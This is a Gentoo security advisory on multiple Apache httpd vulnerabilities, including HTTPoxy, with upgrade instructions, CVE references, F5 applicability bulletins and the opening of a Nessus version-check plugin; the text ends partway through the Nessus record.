ID: GLSA-201701-36 | Type: gentoo | Reporter: Gentoo Foundation | Modified: 2017-01-15T00:00:00
Description
Background
The Apache HTTP server is one of the most popular web servers on the Internet.
Description
Multiple vulnerabilities have been discovered in Apache. Please review the CVE identifiers, upstream Apache Software Foundation documentation, and HTTPoxy website referenced below for details.
Impact
A remote attacker could cause a Denial of Service condition via multiple vectors or response splitting and cache pollution. Additionally, an attacker could intercept unsecured (HTTP) transmissions via the HTTPoxy vulnerability.
Workaround
There is no known workaround at this time.
Resolution
All Apache users should upgrade to the latest version:
  # emerge --sync
  # emerge --ask --oneshot --verbose ">=www-servers/apache-2.4.25"

Affected package
www-servers/apache on Gentoo (all architectures), versions lower than 2.4.25.

CVE identifiers
CVE-2014-3583, CVE-2016-0736, CVE-2016-2161, CVE-2016-5387, CVE-2016-8073, CVE-2016-8740, CVE-2016-8743

Severity
CVSS v2 score 5.1 (AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL); Vulners score 6.4.

References
Advisory: https://security.gentoo.org/glsa/201701-36 (published 2017-01-15)
https://httpoxy.org/
https://www.apache.org/security/asf-httpoxy-response.txt
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3583
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-0736
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2161
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-5387
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-8073
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-8740
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-8743
https://bugs.gentoo.org/show_bug.cgi?id=529130
https://bugs.gentoo.org/show_bug.cgi?id=589226
https://bugs.gentoo.org/show_bug.cgi?id=601736
https://bugs.gentoo.org/show_bug.cgi?id=603130

Related bulletins (F5, Nessus, Slackware, FreeBSD, Oracle Linux, Amazon, Ubuntu, Debian, OpenVAS, Fedora, Red Hat, CentOS, HackerOne, Apache httpd) are recorded below.
{"f5": [{"lastseen": "2018-09-13T21:51:45", "bulletinFamily": "software", "cvelist": ["CVE-2016-2161", "CVE-2016-0736"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable| None \nBIG-IP WebSafe| None| 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| 
None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.0.2| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2017-08-03T18:02:00", "published": "2017-02-01T19:12:00", "id": "F5:K53437580", "href": "https://support.f5.com/csp/article/K53437580", "title": "Apache vulnerabilities CVE-2016-0736 and CVE-2016-2161", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2020-04-06T22:39:34", "bulletinFamily": "software", "cvelist": ["CVE-2016-8743"], "description": "\nF5 Product Development has assigned ID 641101 (BIG-IP), ID 641323 (Enterprise Manager), and ID 431234 (ARX) to this vulnerability. 
Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H00373024 on the **Diagnostics** > **Identified** > **Low** page.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases, point releases, or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.5 \n11.4.0 - 11.6.5 \n11.2.1 | 14.1.0 \n14.0.0 \n13.1.0.2 | Low | Apache **httpd** process \nBIG-IP AAM | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.5 \n11.4.0 - 11.6.5 | 14.1.0 \n14.0.0 \n13.1.0.2 | Low | Apache **httpd** process \nBIG-IP AFM | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.5 \n11.4.0 - 11.6.5 | 14.1.0 \n14.0.0 \n13.1.0.2 | Low | Apache **httpd** process \nBIG-IP Analytics | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.5 \n11.4.0 - 11.6.5 \n11.2.1 | 14.1.0 \n14.0.0 \n13.1.0.2 | Low | Apache **httpd** process \nBIG-IP APM | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.5 \n11.4.0 - 11.6.5 \n11.2.1 | 14.1.0 \n14.0.0 \n13.1.0.2 | Low | Apache **httpd** process \nBIG-IP ASM | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.5 \n11.4.0 - 11.6.5 \n11.2.1 | 14.1.0 \n14.0.0 \n13.1.0.2 | Low | Apache **httpd** process \nBIG-IP DNS | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.5 | 14.1.0 \n14.0.0 \n13.1.0.2 | Low | Apache **httpd** process \nBIG-IP Edge Gateway | 11.2.1 | None | Low | Apache **httpd** process \nBIG-IP GTM | 11.4.0 - 11.6.5 \n11.2.1 | None | Low | Apache **httpd** process \nBIG-IP Link Controller | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.5 \n11.4.0 - 11.6.5 \n11.2.1 | 14.1.0 \n14.0.0 \n13.1.0.2 | Low | Apache **httpd** process \nBIG-IP PEM | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.5 \n11.4.0 - 11.6.5 | 14.1.0 \n14.0.0 \n13.1.0.2 | Low | Apache **httpd** process \nBIG-IP PSM | 11.4.0 - 11.4.1 | None | Low | Apache **httpd** 
process \nBIG-IP WebAccelerator | 11.2.1 | None | Low | Apache **httpd** process \nBIG-IP WebSafe | 13.0.0 - 13.1.0 \n12.0.0 - 12.1.5 \n11.6.0 - 11.6.5 | 14.1.0 \n14.0.0 \n13.1.0.2 | Low | Apache **httpd** process \nARX | 6.2.0 - 6.4.0 | None | Low | Apache **httpd** process, Management API (disabled by default) \nEnterprise Manager | 3.1.1 | None | Low | Apache **httpd** process \nBIG-IQ Cloud | None | 4.0.0 - 4.5.0 | Not vulnerable1 | None \nBIG-IQ Device | None | 4.2.0 - 4.5.0 | Not vulnerable1 | None \nBIG-IQ Security | None | 4.0.0 - 4.5.0 | Not vulnerable1 | None \nBIG-IQ ADC | None | 4.5.0 | Not vulnerable1 | None \nBIG-IQ Centralized Management | None | 5.0.0 - 5.1.0 \n4.6.0 | Not vulnerable1 | None \nBIG-IQ Cloud and Orchestration | None | 1.0.0 | Not vulnerable1 | None \nF5 iWorkflow | None | 2.0.0 - 2.0.2 | Not vulnerable | None \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nTraffix SDC | None | 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0 | Not vulnerable | None \n \n1The specified products contain the affected code. However, F5 identifies the vulnerability status as Not vulnerable because the attacker cannot exploit the code in default, standard, or recommended configurations.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nBIG-IP and Enterprise Manager\n\nTo mitigate this vulnerability, you should limit access to the Configuration utility to use only secure networks.\n\nARX\n\nTo mitigate this vulnerability, you should limit access to the ARX GUI to use only secure networks. 
Additionally, you should avoid enabling the API functionality.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2020-03-16T20:15:00", "published": "2017-02-04T02:10:00", "id": "F5:K00373024", "href": "https://support.f5.com/csp/article/K00373024", "title": "Apache vulnerability CVE-2016-8743", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2017-06-08T00:16:28", "bulletinFamily": "software", "cvelist": ["CVE-2016-8740"], "edition": 1, "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 
12.1.1| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.1 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebSafe| None| 12.0.0 - 12.1.1 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.0.2| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "modified": "2016-12-09T23:06:00", "published": "2016-12-09T23:06:00", "href": "https://support.f5.com/csp/article/K32071141", "id": "F5:K32071141", "type": "f5", "title": "Apache mod_http2 vulnerability CVE-2016-8740", "cvss": {"score": 5.0, 
"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-02-20T21:07:31", "bulletinFamily": "software", "cvelist": ["CVE-2016-5387"], "description": "\nF5 Product Development has assigned ID 431234 (ARX) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.0| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nARX| 6.2.0 - 6.4.0| None| Low| Apache HTTP server \nEnterprise Manager| None| 3.1.1| Not 
vulnerable| None \nFirePass| None| 7.0.0| Not vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 MobileSafe| None| 1.0.0| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 5.0.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K12766: ARX hotfix matrix](<https://support.f5.com/csp/article/K12766>)\n", "edition": 1, "modified": "2017-03-14T19:09:00", "published": "2016-08-02T21:36:00", "id": "F5:K80513384", "href": "https://support.f5.com/csp/article/K80513384", "title": "Apache HTTPD vulnerability CVE-2016-5387", "type": "f5", "cvss": {"score": 5.1, "vector": 
"AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:23:06", "bulletinFamily": "software", "cvelist": ["CVE-2016-5387"], "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL12766: ARX hotfix matrix\n", "edition": 1, "modified": "2016-08-02T00:00:00", "published": "2016-08-02T00:00:00", "id": "SOL80513384", "href": "http://support.f5.com/kb/en-us/solutions/public/k/80/sol80513384.html", "type": "f5", "title": "SOL80513384 - Apache HTTPD vulnerability CVE-2016-5387", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-10-12T02:11:18", "bulletinFamily": "software", "cvelist": ["CVE-2014-3583", "CVE-2014-3581", "CVE-2014-8109"], "edition": 1, "description": "Description \n\n\n * [CVE-2014-8109](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8109>) \n \nmod_lua.c in the mod_lua module in the Apache HTTP Server 2.3.x and 2.4.x through 2.4.10 does not support an httpd configuration in which the same Lua authorization provider is used with different arguments within different contexts, which allows remote attackers to bypass intended access restrictions in opportunistic circumstances by leveraging multiple Require directives, as 
demonstrated by a configuration that specifies authorization for one group to access a certain directory, and authorization for a second group to access a second directory. \n \n\n * [CVE-2014-3581](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3581>) \n \nThe cache_merge_headers_out function in modules/cache/cache_util.c in the mod_cache module in the Apache HTTP Server before 2.4.11 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via an empty HTTP Content-Type header. \n \n\n * [CVE-2014-3583](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3583>) \n \nThe handle_headers function in mod_proxy_fcgi.c in the mod_proxy_fcgi module in the Apache HTTP Server 2.4.10 allows remote FastCGI servers to cause a denial of service (buffer over-read and daemon crash) via long response headers. \n\n\nImpact \n\n\nThere is no impact; F5 products are not affected by these vulnerabilities.\n\nStatus\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | None \n| 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP AAM | None | 11.4.0 - 11.6.0 | Not vulnerable | None \nBIG-IP AFM | None | 11.3.0 - 11.6.0 | Not vulnerable | None \nBIG-IP Analytics | None | 11.0.0 - 11.6.0 | Not vulnerable | None \nBIG-IP APM | None | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP ASM | None | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP Edge Gateway \n| None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP GTM | None | 11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP Link Controller | None | 
11.0.0 - 11.6.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP PEM | None | 11.3.0 - 11.6.0 | Not vulnerable | None \nBIG-IP PSM | None | 11.0.0 - 11.4.1 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WebAccelerator | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nBIG-IP WOM | None | 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4 | Not vulnerable | None \nARX | None \n| 6.0.0 - 6.4.0 \n| Not vulnerable | None \n \nEnterprise Manager | None \n| 3.0.0 - 3.1.1 | Not vulnerable | None \nFirePass | None \n| 7.0.0 \n6.0.0 - 6.1.0 \n| Not vulnerable | None \n \nBIG-IQ Cloud | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Device | None | 4.2.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ Security | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nBIG-IQ ADC | None | 4.0.0 - 4.5.0 | Not vulnerable | None \nLineRate | None \n| 2.5.0 - 2.6.0 \n| Not vulnerable | None \n \nF5 WebSafe | None \n| 1.0.0 \n| Not vulnerable | None \n \nTraffix SDC | None \n| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1 \n| Not vulnerable | None \n \n \nRecommended Action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. 
The Severity values and other security vulnerability parameters are defined in [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nSupplemental Information\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x)](<https://support.f5.com/csp/article/K13123>)\n", "modified": "2016-01-09T02:23:00", "published": "2015-07-03T00:14:00", "id": "F5:K16847", "href": "https://support.f5.com/csp/article/K16847", "title": "Apache vulnerabilities CVE-2014-8109, CVE-2014-3581, CVE-2014-3583", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2016-09-26T17:23:30", "bulletinFamily": "software", "cvelist": ["CVE-2014-3583", "CVE-2014-3581", "CVE-2014-8109"], "edition": 1, "description": "Recommended Action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. 
The Severity values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x)\n", "modified": "2015-07-02T00:00:00", "published": "2015-07-02T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/800/sol16847.html", "id": "SOL16847", "title": "SOL16847 - Apache vulnerabilities CVE-2014-8109, CVE-2014-3581, CVE-2014-3583", "type": "f5", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-12T11:05:38", "description": "The remote host is affected by the vulnerability described in GLSA-201701-36\n(Apache: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Apache. Please review\n the CVE identifiers, upstream Apache Software Foundation documentation,\n and HTTPoxy website referenced below for details.\n \nImpact :\n\n A remote attacker could cause a Denial of Service condition via multiple\n vectors or response splitting and cache pollution. 
Additionally, an\n attacker could intercept unsecured (HTTP) transmissions via the HTTPoxy\n vulnerability.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 25, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-01-16T00:00:00", "title": "GLSA-201701-36 : Apache: Multiple vulnerabilities (httpoxy)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2161", "CVE-2014-3583", "CVE-2016-8743", "CVE-2016-8740", "CVE-2016-5387", "CVE-2016-0736"], "modified": "2017-01-16T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:apache"], "id": "GENTOO_GLSA-201701-36.NASL", "href": "https://www.tenable.com/plugins/nessus/96516", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201701-36.\n#\n# The advisory text is Copyright (C) 2001-2017 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96516);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-3583\", \"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-5387\", \"CVE-2016-8740\", \"CVE-2016-8743\");\n script_xref(name:\"GLSA\", value:\"201701-36\");\n\n script_name(english:\"GLSA-201701-36 : Apache: Multiple vulnerabilities (httpoxy)\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201701-36\n(Apache: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Apache. Please review\n the CVE identifiers, upstream Apache Software Foundation documentation,\n and HTTPoxy website referenced below for details.\n \nImpact :\n\n A remote attacker could cause a Denial of Service condition via multiple\n vectors or response splitting and cache pollution. 
